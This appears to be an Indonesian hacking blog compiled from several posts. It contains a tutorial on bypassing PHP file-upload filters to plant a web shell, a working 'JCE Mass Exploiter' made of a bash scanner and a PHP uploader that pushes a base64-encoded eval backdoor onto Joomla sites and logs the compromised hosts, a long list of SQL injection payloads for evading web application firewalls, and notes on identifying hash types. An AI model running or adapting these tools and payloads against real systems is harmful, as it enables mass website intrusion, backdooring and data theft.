Kamis, 17 April 2014

Attacker VS Webmaster

Sebelum memulai kita persiapkan dulu alat2nya
1. localhost ( xampp,lampp,appserv,etc) atau web pun boleh
2. notepad
3. buat folder dengan nama "image"

[ start of war ]
##developer
buat file php
dengan script:
<?php
if(isset($_POST['upload'])) {
$target_path="image/";
$target_path = $target_path.basename($_FILES['img']['name']);
if(move_uploaded_file($_FILES['img']['tmp_name'],$target_path)){
echo "the file " . basename($_FILES['img']['name']) . " has been uploaded! ";
}else {
echo "there was an error uploading the file ,please try again!";
}
}
?>
<form action="" method="post" enctype="multipart/form-data">
<input type="file" size="20" name="img" />
<input type="submit" name="upload" value="Upload" />
</form>

lalu simpan di web/localhost tadi

lalu buka filenya di localhost atau web kamu

silahkan upload shell
dan hasilnya pasti bisa

## patching 1 #

kemudian si developer mempathing script

$target_path="image/";
$target_path = $target_path.basename($_FILES['img']['name']);
if(move_uploaded_file($_FILES['img']['tmp_name'],$target_path)){
echo "the file " . basename($_FILES['img']['name']) . " has been uploaded! ";
}else {
echo "there was an error uploading the file ,please try again!";
}

dengan
script "PHP Arbitrary File"
guna menentukan file apa aja yang bisa masuk melalui file upload tersebut
scriptnya ialah:

if($_FILES['img']['type'] != "image/gif") {
echo "Sorry, we only allow uploading GIF images";
exit;
}
$uploaddir = 'image/';
$uploadfile = $uploaddir . basename($_FILES['img']['name']);
if (move_uploaded_file($_FILES['img']['tmp_name'], $uploadfile)) {
echo "File is valid, and was successfully uploaded.\n";
} else {
echo "File uploading failed.\n";
}

sehingga menjadi:

<?php
if($_FILES['img']['type'] != "image/gif") {
echo "Sorry, we only allow uploading GIF images";
exit;
}
$uploaddir = 'image/';
$uploadfile = $uploaddir . basename($_FILES['img']['name']);
if (move_uploaded_file($_FILES['img']['tmp_name'], $uploadfile)) {
echo "File is valid, and was successfully uploaded.\n";
} else {
echo "File uploading failed.\n";
}
?>
<form action="" method="post" enctype="multipart/form-data">
<input type="file" size="20" name="img" />
<input type="submit" name="upload" value="Upload" />
</form>

melihat hal itu si attacker pun mencari kelemahan script tersebut
kemudian si attacker membaca cara kerja dari script tersebut
yakni
script tersebut akan meloloskan suatu file yang memiliki content-type "image/gif" selain itu gagal terupload
dengan informasi tersebut si attacker lalu membuat sebuah teknik yang memerlukan sedikit bantuan addon
semisal tamperdata atau yg sejenis

# bypass 1#

1. install addon tamperdata di firefox
2. shell.php rename jadi shell.php.jpg atau shell.jpg
3. hidupkan tamperdata: tools -> tamper data -> start tamper
4. upload shell.php.jpg tadi -> klik upload -> lalu tamper
5. kemudian cari nama file "shell.php.jpg" lalu ganti dengan shell.php -> ok

hasil: shell pun terupload

## patcing2 ##

melihat script uploadnya bisa di bypass attacker
si developer tadi memutar otaknya mencari cara patchingnya
akhirnya ia menemukan cara yaitu dengan memanfaatkan system blacklist yakni
membatasi jenis2 file yang sudah di blacklist
cara patchingnya adalah dengan cara mengganti script:

if($_FILES['img']['type'] != "image/gif") {
echo "Sorry, we only allow uploading GIF images";
exit;
}
$uploaddir = 'image/';
$uploadfile = $uploaddir . basename($_FILES['img']['name']);
if (move_uploaded_file($_FILES['img']['tmp_name'], $uploadfile)) {
echo "File is valid, and was successfully uploaded.\n";
} else {
echo "File uploading failed.\n";
}

dengan script blacklist:

$blacklist = array(".php",".html",".shtml",".phtml", ".php3", ".php4");
foreach ($blacklist as $item) {
if(preg_match("/$item\$/", $_FILES['img']['name'])) {
echo "We do not allow uploading PHP files\n";
exit;
}
}
$uploaddir = 'image/';
$uploadfile = $uploaddir . basename($_FILES['img']['name']);
if (move_uploaded_file($_FILES['img']['tmp_name'], $uploadfile)) {
echo "File is valid, and was successfully uploaded.\n";
} else {
echo "File uploading failed.\n";
}

sehingga menjadi:

<?php
$blacklist = array(".php",".html",".shtml",".phtml", ".php3", ".php4");
foreach ($blacklist as $item) {
if(preg_match("/$item\$/", $_FILES['img']['name'])) {
echo "We do not allow uploading PHP files\n";
exit;
}
}
$uploaddir = 'image/';
$uploadfile = $uploaddir . basename($_FILES['img']['name']);
if (move_uploaded_file($_FILES['img']['tmp_name'], $uploadfile)) {
echo "File is valid, and was successfully uploaded.\n";
} else {
echo "File uploading failed.\n";
}
?>
<form action="" method="post" enctype="multipart/form-data">
<input type="file" size="20" name="img" />
<input type="submit" name="upload" value="Upload" />
</form>

dengan script di atas ketika sang attacker mengupload shellnya dengan cara ## bypass 1 ##
maka attacker mendapatkan pesan bahwa file nya tidak bisa terupload.

## bypass 2 ##

Dengan kegagalan ini sang atacker pun kembali menganalisa script yang ada di atas
dan menyimpulkan bahwa ketika shell di tamper dengan nama shell.php bisa error
dikarenakan ektensi .php telah masuk daftar blacklist sehingga akan menjadi error
melihat hasil kesimpulan tersebut si attacker pun mencoba serangan yakni mencoba mengupload dengan extensi acak
untuk meyakinkan bahwa ini benar2 script blacklist
kali ini si attacker mencoba mengupload dengan extensi .173 ( namanya juga acak :v )
dan berhasil
dengan ini si attacker yakin bahwa scrpt diatas adalah script blacklist
dan script blacklist tersebut mempunyai kelemahan dimana dia hanya memblacklist jenis file yang ada pada array
jadi extensi .php ada dalam daftar array tersebut
 si attacker pun memulai bypass nya yakni dengan mencoba mengupload dengan extensi .php3 .php4 .php5
 .PHP .pHp dan lain2

alhasil si attacker pun kembali sukses mengupload shell nya

## patching3 ##
tak berhenti disitu persaingan sang develop dan attacker masih berlanjut
mengetahui kalau script blacklistnya masih mampu ditembus kemudian sang developer
kembali berfikir keras memikirkan bagaimana patchingnya
kemudian dia menemukan cara yakni dengan script mime
lau dia mengubah
scriptnya menjadi

<?php
$imageinfo = getimagesize($_FILES['img']['tmp_name']);
if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg') {
echo "Sorry, we only accept GIF and JPEG images\n";
exit;
}

$uploaddir = 'image/';
$uploadfile = $uploaddir . basename($_FILES['img']['name']);
if (move_uploaded_file($_FILES['img']['tmp_name'], $uploadfile)) {
echo "File is valid, and was successfully uploaded.\n";
} else {
echo "File uploading failed.\n";
}?>
<form action="" method="post" enctype="multipart/form-data">
<input type="file" size="20" name="img" />
<input type="submit" name="upload" value="Upload" />
</form>

cara kerja script mime ialah dimana dia hanya mengijinkan file yang mempunyai header jpg atau gif
guna meloloskan file agar bisa di upload
dengan ini si attacker pun tak bisa mengupload shellnya walaupun di rename jpg karena tak mempunyai header image

##bypass3##
dengan mengetahui cara kerja tersebut sang attacker pun memulai serangannya
kali ini dia hanya menyisipkan kata
GIF89a;
pada awal script
seperti pada kasus kang hmei7 pada shell JCE (http://www.joshpate.com/2013/01/how-to-fix-hacked-by-hmei7-on-joomla-web-site/)
sehingga script menjadi:

GIF89a;
<?php
script shell
?>

karena sang attacker memanfaatkan comand hearder ( GIF89a; ) guna memanipulasi script mime agar mengidentifikasikan script shell sebagai
image, setelah di rename jadi .gif dan di tamper alhasil sang attacker pun kembali berhasil menembus script mime

##patching4##
tak tinggal diam ketika sang develop mengetahui script mimenya berhasil ditembus
kemudian dia mulai berfikir keras dan mengumpulkan bahan2 guna meramu script
yang sulit ditembus oleh sang attacker
dan akhinya dia pun kembali mempatch scriptnya dengan memodifikasinya menjadi:

<?php

if(isset($_POST['upload'])) {


    $jenis_konten = $_FILES['img']['type'];


    if(preg_match("/image/",$jenis_konten)) {

        $file_sementara = $_FILES['img']['tmp_name'];

        /**
         //periksa lagi, **cacat
         $info_gambar = @getimagesize($file_sementara);

         if(!preg_match("/image/",$info_gambar['mime'])) {
         //belum percaya periksa lagi resolusi **cacat
         if((!isset($info_gambar[0])) && (!isset($info_gambar[1]))) {
         die("Atut, ada hekel... :p");
         }
         }

       
         $file_dipermanenkan = dirname(__file__)."/".$_FILES['img']['name'];

       
         if(move_uploaded_file($file_sementara,$file_dipermanenkan)) {
         echo "File <strong>".$_FILES['img']['name']. "</strong> berhasil diunggah.";
         } else {
         echo "Gagal mengunggah!";
         }
       
         **/

        $file_dipermanenkan = "/".sha1(rand(0,9999)).".jpg";
        $filename = $file_sementara;
        $percent = 1;

        // ciplak resolusi
        // pendeteksian ini masih bisa lolos dgn teknik RGB
        $size = getimagesize($filename); //diambil dari file temp, bukan $_FILE['mime']
        $width = $size[0];
        $height = $size[1];
        $mime = $size['mime'];

        //jika butuh memperkecil gambar
        $new_width = $width * $percent;
        $new_height = $height * $percent;

        // buat gambar baru


        if(preg_match('/png|jpeg|jpg|gif/',$mime)) {
            $image_p = imagecreatetruecolor($new_width,$new_height);
            if((preg_match('/jpg/',$mime)) || (preg_match('/jpeg/',$mime))) {
                $image = imagecreatefromjpeg($filename);
            }
            if(preg_match('/png/',$mime)) {
                $image = imagecreatefrompng($filename);
            }
            if(preg_match('/gif/',$mime)) {
                $im = imagecreatefromgif($filename);
            }
        }
        if(!@imagecopyresampled($image_p,$image,0,0,0,0,$new_width,$new_height,$width,$height)) {
            $image_p = imagecreate(200,100);
            $bg = imagecolorallocate($image_p,255,255,255);
            $black = imagecolorallocate($image_p,0,0,0);
            imagestring($image_p,5,2,2,'Gambar Korupsi',$black);
        }

        // Output
        imagejpeg($image_p,dirname(__file__).$file_dipermanenkan,100);
        echo '<a href="'.$file_dipermanenkan.'">'.$file_dipermanenkan.'</a>';

    } else {
        echo "Jenis file yang anda unggah bukan gambar.";
    }
}

?>
<form action="" method="post" enctype="multipart/form-data">
<input type="file" size="20" name="img" required="on" />
<input type="submit" name="upload" value="Upload" />
</form>


jujur sampai sekarang saya belum bisa nembus script patch yang terakhir diatas heheheh
selesailah sampai disini cerita persaingan makhluk dibalik monitor
namun dari cerita panjang ini kita pasti akan mendapat banyak pelajaran dan ilmu yang baru heheh
sengaja saya buat cerita agar tidak terlalu kaku ketika kita membaca tutorial xixixi


"jangan pernah takut pada kesusahan tapi takutlah pada kemudahan, karena ketika kita mampu
menghadapi kesusahan pastilah kita siap menghadapi kemudahan, namun jikalau kita mampu menghadapi
kemudahan belum tentu kita siap menghadapi kesusahan"



Credit To MBT Member :X'1N73CT a.k.a cyber173


Jumat, 17 Januari 2014

JCE MASS EXPLOITER

========================================
.sh
========================================
#!/bin/bash
# Jce Server Scanner && Exploiter
# Coded By : Red V!per  
# http://redhat-viper.blogspot.com
# Report Bugs : RedH4t.Viper@yahoo.com
# D3m00 : http://www.mediafire.com/download/slq8r7g5211id51/jce.mp4
# Gr33tz   : All Turkish && Persian Hacker
#--------------------------------------------------------------------------------------------------------------------
#
# Tnx 2 : IrIsT.Ir && turk-bh.ir && ibh.ir && 3xp1r3.com && madleets.com 
# devil-zone.net && kurdhackteam.com && www.turkhackteam.net && thecrowscrew.org
#


#-------------------- Red V!per Banner ----------------------------------------------------------------------------
Banner()
{
clear 
echo -e '\E[34m'" ||______________________________________________________|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||                                                      || "; tput sgr0
echo -e '\E[34m'" ||\E[31m  _____          _  __      ___                       \E[34m|| "; tput sgr0 
echo -e '\E[34m'" ||\E[31m |  __ \        | | \ \    / / |                      \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | |__) |___  __| |  \ \  / /| |_ __   ___ _ __       \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m |  _  // _ \/ _\ |   \ \/ / | | '_ \ / _ \ '__|      \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m | | \ \  __/ (_| |    \  /  |_| |_) |  __/ |         \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m |_|  \_\___|\__,_|     \/   (_) .__/ \___|_|         \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m                               | |                    \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[31m                               |_|                    \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m   _                                                  \E[34m|| "; tput sgr0     
echo -e '\E[34m'" ||\E[32m  (_)                                                 \E[34m|| "; tput sgr0  
echo -e '\E[34m'" ||\E[32m   _  ___ ___   ___  ___ __ _ _ __  _ __   ___ _ __   \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m  | |/ __/ _ \ / __|/ __/ _\ | '_ \| '_ \ / _ \ '__|  \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m  | | (_|  __/ \__ \ (_| (_| | | | | | | |  __/ |     \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m  | |\___\___| |___/\___\__,_|_| |_|_| |_|\___|_|     \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m _/ |                                                 \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||\E[32m|__/                                                  \E[34m|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||------------------------------------------------------|| "; tput sgr0
echo -e '\E[34m'" ||______________________________________________________|| "; tput sgr0
sleep 3
echo
echo -e "$B /\ (^_^) /\ [public] \n"
echo -e " -===============================================-\n"
echo -e "   Server Jce Scanner && Exploiter"
echo  
echo -e "   BY : Red V!per\n"
echo -e " -===============================================-"
echo
echo
echo -e " -========== [         INFO         ] ===========-"
echo
read -p "[*] Target Ip : " IP
echo -e "$N"
}

#-------------------- Variables ----------------------------------------------------------------------------

B="\033[1m"
N="\033[0m"
L="\033[5m"
C="\033[m"

#-------------------- Scanning Jce Targets on Server  -------------------------------------------------------

scan_jce_on_victim()
{
page=0  
how_many=1  
single_page=  
last_page_check=
image_manager="index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20"

 while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do  
  
url="http://www.bing.com/search?q=ip%3a$IP+%27index.php?option=com_%27&qs=n&pq=ip%3a$IP+%27index.php?option=com_%27&sc=8-26&sp=-1&sk=&first=${page}1&FORM=PERE"  
  
 wget -q -O domain_bing.php --user-agent="Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9b5) Gecko/2008050509 Firefox/3.0b5" "$url"  
  
 last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' domain_bing.php`  
    
 how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3`  
  
 single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' domain_bing.php `  
  
  
  cat domain_bing.php | egrep -o "<h3><a href=\"[^\"]+" domain_bing.php | cut -d '"' -f 2 >> alldomain_bing.txt  
  rm -f domain_bing.php  
  let page=$page+1   
  done  
  
cat alldomain_bing.txt | grep "com_" | tr '[:upper:]' '[:lower:]' | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | sed '/www./s///g' | cut -d '?' -f 1 | awk '{gsub("/index.php","")}1' | sort | uniq >> domains.txt
  
for domain in `cat domains.txt`  
   do  
     GET -sd "http://www.$domain/$image_manager" | grep "OK" >> /dev/null;check=$?
      if [ $check -eq 0 ]
         then
           echo "www.$domain" > site.lst
           php jce.php site.lst shells.lst
  GET -s "http://www.$domain/images/stories/vanda.php" | grep "GIF89a1" >> /dev/null;check2=$?
  if [ $check2 -eq 0 ]
  then
  echo -e "$B[+] www.$domain \e[1;32m[Trying to upload shell] \e[0m"
  echo -e "$B[+] Shell : www.$domain/images/stories/vanda.php \e[1;31m[OK] \e[0m"
  echo "www.$domain/images/stories/vanda.php" >> vanda_shells.lst
  else
  echo "[-] www.$domain/ [No] "
  fi    
       else
         echo "[-] www.$domain/ [No] "
      fi    
   done  
rm -rf alldomain_bing.txt 
rm -rf domains.txt 
rm -rf site.lst 
rm -rf shells.lst
}

#-------------------- Remove  ------------------------------------------------------------------------
all_remove()
{
 rm -rf alldomain_bing*
 rm -rf domains_f*
 rm -rf domains_f*
 rm -rf domain_bing*  
 rm -rf alldomain_bing*
 rm -rf domains*
 rm -rf jce_server*
 rm -rf site*
}

#-------------------- Main Brain :D  ------------------------------------------------------------------------
main()
{
chmod +x jce.php 

if [ ! -f shells.lst ]; then
    touch shells.lst ;
fi

Banner;
all_remove;
scan_jce_on_victim;
}

main;

========================================
.php
========================================
<?php

/*
# Mass Uploader   
# Coded By Mua & Keresteci
# Recoded By Red V!per
*/

    $kirilmis = 0;

    $taranmis = 0;

    error_reporting(0);

    ini_set("max_execution_time", 0);

    ini_set("default_socket_timeout", 3);

    function oku($link)

    {

        $site         = parse_url($link);

        $link         = $site["path"];

        $site         = $site["host"];

        $httpresponse = "";

        $fp           = fsockopen($site, 80, $err_num, $err_msg, 30);

        if ($fp) {

            fputs($fp, "GET $link HTTP/1.0\r\nHost: $site\r\n\r\n");

            fputs($fp, "Connection: close\n\n");

            while (!feof($fp)) {

                $http_response .= fgets($fp, 128);

            }

            fclose($fp);

        }

        return $http_response;

    }

    $dosya      = $argv[1];

    $kirilanlar = fopen($argv[2], 'w');

    $okunan = file($dosya);

    $toplam = count($okunan);

    foreach ($okunan as $sira => $satir) {

        $hatalisite = 0;

        $satir      = preg_replace("/[\\n\\r]+/", "", $satir);

        $url        = parse_url($satir);

        if ($url["scheme"])

            $host = $url["host"];

        else {

            $url  = parse_url("http://" . $satir);

            $host = $url["host"];

        }


        $packet = "Mua-Kontrol-Paketi-Panpa";


        $fp = fsockopen('tcp://' . $host, 80, $errno, $errstr, 5);

        if ($fp) {

            fwrite($fp, $packet);

            fclose($fp);

        }

        $content = "GIF89a1\n";

        $content .= '<?php eval("?>".base64_decode("PGh0bWw+IENvZGVkIEJ5IE11YSAmIEtlcmVzdGVjaTxicj4NCjw/IA0KLyogQ29kZWQgQnkgTXVhICYgS2VyZXN0ZWNpICovDQplY2hvICc8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBuYW1lPSJ1cGxvYWRlciIgaWQ9InVwbG9hZGVyIj4nOw0KZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7DQppZiggJF9QT1NUWydfdXBsJ10gPT0gIlVwbG9hZCIgKSB7DQoJaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnPGI+dXN0YSB1cGxvYWQgYmFzYXJpbGk8L2I+PGJyPjxicj4nOyB9DQp9DQo/PjwvaHRtbD4=")); ?>';

        $data = "-----------------------------41184676334\r\n";

        $data .= "Content-Disposition: form-data; name=\"upload-dir\"\r\n\r\n";

        $data .= "/\r\n";

        $data .= "-----------------------------41184676334\r\n";

        $data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"\"\r\n";

        $data .= "Content-Type: application/octet-stream\r\n\r\n\r\n";

        $data .= "-----------------------------41184676334\r\n";

        $data .= "Content-Disposition: form-data; name=\"upload-overwrite\"\r\n\r\n";

        $data .= "0\r\n";

        $data .= "-----------------------------41184676334\r\n";

        $data .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"mua.gif\"\r\n";

        $data .= "Content-Type: image/gif\r\n\r\n";

        $data .= "$content\r\n";

        $data .= "-----------------------------41184676334\r\n";

        $data .= "0day\r\n";

        $data .= "-----------------------------41184676334\r\n";

        $data .= "Content-Disposition: form-data; name=\"action\"\r\n\r\n";

        $data .= "upload\r\n";

        $data .= "-----------------------------41184676334--\r\n\r\n\r\n\r\n";

        $packet = "POST " . $p . "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 HTTP/1.1\r\n";

        $packet .= "Host: " . $host . "\r\n";

        $packet .= "User-Agent: BOT/0.1 (BOT for JCE)\r\n";

        $packet .= "Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n";

        $packet .= "Accept-Language: en-us,en;q=0.5\r\n";

        $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";

        $packet .= "Cookie: 6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743; jce_imgmanager_dir=%2F; __utma=216871948.2116932307.1317632284.1317632284.1317632284.1; __utmb=216871948.1.10.1317632284; __utmc=216871948; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)\r\n";

        $packet .= "Connection: Close\r\n";

        $packet .= "Proxy-Connection: close\r\n";

        $packet .= "Content-Length: " . strlen($data) . "\r\n\r\n\r\n\r\n";

        $packet .= $data;


            $fp = fsockopen('tcp://' . $host, 80, $errno, $errstr, 5);

            if ($fp) {

                fwrite($fp, $packet);

                fclose($fp);

            }


        $packet = "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1\r\n";

        $packet .= "Host: " . $host . "\r\n";

        $packet .= "User-Agent: Mua \r\n";

        $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";

        $packet .= "Accept-Language: en-US,en;q=0.8\r\n";

        $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";

        $packet .= "Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n";

        $packet .= "Accept-Encoding: deflate\n";

        $packet .= "X-Request: JSON\r\n";

        $packet .= "Cookie: __utma=216871948.2116932307.1317632284.1317639575.1317734968.3; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=216871948.20.10.1317734968; __utmc=216871948; jce_imgmanager_dir=%2F; 6bc427c8a7981f4fe1f5ac65c1246b5f=7df6350d464a1bb4205f84603b9af182\r\n";

        $ren = "json={\"fn\":\"folderRename\",\"args\":[\"/mua.gif\",\"vanda.php\"]}";

        $packet .= "Content-Length: " . strlen($ren) . "\r\n\r\n";

        $packet .= $ren . "\r\n\r\n";

            $fp = fsockopen('tcp://' . $host, 80, $errno, $errstr, 5);

            if ($fp) {

                fwrite($fp, $packet);

                fclose($fp);

            }

        $taranmis = $taranmis + 1;

            $kod      = oku("http://" . $host . "/images/stories/vanda.php");

            $pozisyon = strpos($kod, "GIF89a1");

            if ($pozisyon == true) {

                $kirilmis = $kirilmis + 1;

                fwrite($kirilanlar, "http://" . $host . "/images/stories/vanda.php\r\n");

            }
    } //for each


    fclose($yaz);

    fclose($kirilanlar);

Senin, 13 Januari 2014

Bypass WAF

[~] order by [~]

/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/

[~] UNION select [~]

/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+

[~] information_schema.tables [~]

/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table

[~] concat() [~]

CoNcAt()
concat()
CON%08CAT()
CoNcAt()
%0AcOnCat()
/**//*!12345cOnCat*/
/*!50000cOnCat*/(/*!*/)
unhex(hex(concat(table_name)))
unhex(hex(/*!12345concat*/(table_name)))
unhex(hex(/*!50000concat*/(table_name)))

Selasa, 24 Desember 2013

Jenis Jenis Hash

Beberapa tipe hash yang wajib diketahui oleh coder ..!!!


Mungkin sobat semua yang udah pada jago sqli pasti pernah mengalami kesulitan untuk mengenali jenis hash yang sobat sekalian temukan, sedikit info tentang tipe-tipe hash.


1.MD5(Message-Digest algortihm 5)
=> MD5 di desain oleh Ronald Rivest pada tahun 1991 untuk menggantikan hash function sebelumnya, MD4. Pada tahun 1996 (wikipedia)
- digunakan di phpBB v2.x, Joomla versi dibawah 1.0.13 dan digunakan oleh beberapa CMS dan forum
- panjangnya 16 bytes (32 karakter)
- contoh : c4ca4238a0b923820dcc509a6f75849b

2.MD5($pass.$salt)
=> digunakan di WB News, Joomla versi 1.0.13 dan versi diatasnya
- panjang 16 bytes (32 karakter)
hash yang satu ini dimulai dari hashnya duluan kemudian dilanjutkan oleh saltnya
- contoh : 6f04f0d75f6870858bae14ac0b6d9f73

3.MD5($salt.$pass)
=> digunakan di osCommerce, AEF, Gallery dan beberapa CMS lainnya
- panjang 16 bytes (32 karakter)
hash yang satu ini dimulai dari saltnya duluan kemudian dilanjutkan oleh hashnya
- contoh : f190ce9ac8445d249747cab7be43f7d

4.md5(md5($pass).$salt)
=> digunakan di vBulletin, IceBB dan cms lainnya
- panjang 16 bytes (32 karakter)
- contoh : 6011527690eddca23580955c216b1fd2

5.MD5(Wordpress)
=> digunakan di wordpress
- panjangnya 17 bytes (34 karakter)
- hashnya dimulai oleh tanda $P$ kemudian dilanjutkan oleh sebuah karakter (karakter yg paling sering dipakai adalah huruf "B") kemudian dilanjutkan oleh saltnya (8 karakter yg disusun secara acak, dalam contoh ini saltnya adalah "12345678") lalu dilanjutkan oleh hashnya
- contoh : $P$B123456780BhGFYSlUqGyE6ErKErL01

6.MD5(phpBB3)
=> digunakan di CMS phpBB 3.x.x
- panjangnya 17 bytes (34 karakter)
